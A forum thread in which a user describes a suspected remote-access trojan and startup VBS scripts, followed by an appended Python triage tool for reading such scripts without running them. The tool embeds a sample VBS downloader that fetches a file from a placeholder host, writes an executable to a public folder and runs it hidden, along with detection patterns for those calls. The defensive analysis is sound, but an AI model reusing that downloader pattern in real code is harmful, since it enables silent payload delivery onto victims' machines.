Your Windows 10 system is compromised with a malicious backdoor. What should you do next?
The situation involves a potential RAT on your PC. I noticed suspicious activity after someone attempted to drain my PayPal account, which I managed to stop just in time. The machine is located right beside me and isn't connected to any network. I plan to wipe it, though I'm unsure what the attacker did beforehand. There seems to be no active investigation yet—Defender logs are corrupted, and updates appear delayed, suggesting this might not have happened recently. Good news: the PC is seldom used (last usage was over two weeks ago) and it's relatively new, so I’m not sure how to proceed. Any advice or tips would be appreciated. Edit: Further checks revealed two dump files—one dated the 17th of this month and another today. They mostly contain random data but include readable entries like names of my Ethernet adapters.
I assumed there was a rodent in your computer just from the title. Or perhaps you mean the mouse next to your PC. Bad jokes aside, back up all your crucial files. After backup, consider investigating further to find the remote access tool or you might want to erase the hard drive and reinstall Windows.
I hope it was just a genuine rat. Luckily the PC has nothing crucial on it, so I’ll go ahead and destroy it. I ended up discovering some VBS scripts that run at startup and either fetch an image or an MP3 from a questionable site, but that’s where the investigation stops. I won’t download or examine what it’s trying to download, but I have to admit, the script seems fairly simple. Still, it just drops a payload, and I don’t know what it contains.
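One way to record what a startup script like the ones described above does without running it or contacting the site, as an added example that is not part of the thread: a read-only Python triage that treats the script as text and pulls out the URL, the drop path and the calls a downloader needs. The sample script, host name, paths and function names are constructed placeholders.

```python
import re

# Constructed, abridged sample resembling the kind of startup script described
# in the thread; the host name, paths and file names are placeholders.
SAMPLE_VBS = r'''
Set h = CreateObject("MSXML2.XMLHTTP")
h.Open "GET", "http://files.example.invalid/cover.jpg", False
h.Send
Set s = CreateObject("ADODB.Stream")
s.SaveToFile "C:\Users\Public\svc.exe", 2
CreateObject("WScript.Shell").Run "C:\Users\Public\svc.exe", 0, False
'''

# COM components and methods commonly seen together in script downloaders.
INDICATORS = {
    "http_client": r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest|Microsoft\.XMLHTTP",
    "binary_write": r"ADODB\.Stream|\.SaveToFile\b",
    "execution": r"WScript\.Shell|Shell\.Application|\.Run\b|\.ShellExecute\b",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\"\r\n]+|%[A-Za-z]+%\\[^\"\r\n]+")
MEDIA_EXT = (".jpg", ".jpeg", ".png", ".gif", ".mp3")
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1")

def triage_vbs(text):
    """Read-only triage: the script is parsed as text and never executed."""
    hits = {name: bool(re.search(rx, text, re.I)) for name, rx in INDICATORS.items()}
    urls = sorted(set(URL_RE.findall(text)))
    paths = sorted(set(p.strip() for p in PATH_RE.findall(text)))
    # A media-looking URL plus an executable written to disk suggests a disguised payload.
    media_url = any(u.lower().split("?")[0].endswith(MEDIA_EXT) for u in urls)
    exec_drop = any(p.lower().endswith(EXEC_EXT) for p in paths)
    return {
        "indicators": hits,
        "urls": urls,
        "paths": paths,
        "looks_like_dropper": all(hits.values()),
        "disguised_payload": media_url and exec_drop,
    }

def defang(url):
    """Make a URL non-clickable before pasting it into notes or a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

if __name__ == "__main__":
    report = triage_vbs(SAMPLE_VBS)
    for key, value in report.items():
        print(f"{key}: {value}")
    print("defanged:", [defang(u) for u in report["urls"]])
```

The drop paths it reports are worth noting before the wipe, since they say where the payload was written and which accounts used on that machine should have their passwords changed from a clean device.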